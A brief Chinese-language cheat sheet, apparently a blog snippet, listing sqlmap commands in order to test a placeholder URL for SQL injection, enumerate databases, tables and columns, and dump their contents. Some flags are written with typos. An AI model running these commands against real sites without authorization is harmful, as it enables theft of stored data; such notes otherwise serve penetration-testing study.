1、判断注入点:sqlmap.py -u url(目标地址)
-u:指定地址
2、爆破数据库名:sqlmap.py -u http://xxx.com/?id=1 --dbs
--dbs:查看所有数据库名
--current-db:查看当前使用的数据库
3、爆破数据表名:sqlmap.py -u http://xxx.com/?id=1 -D 库名 --tables
--D:指定数据库名
--tables:查看指定库下面的所有的表名
4、爆破字段名
sqlmap.py -u http://xxx.com/?id=1 -D 库名 -T 表名 -columns
--T:指定表名
--columns:查看指定库的表中的所有字段名
5、爆破所有数据
sqlmap.py -u http://xxx.com/?id=1 -D 库名 -T 表名 -C 字段名 -dump
-C:指定字段名
--dump:根据指定的库、表、字段爆破里面的数据
Sqlmap注入的命令参数
最新推荐文章于 2024-05-01 12:30:53 发布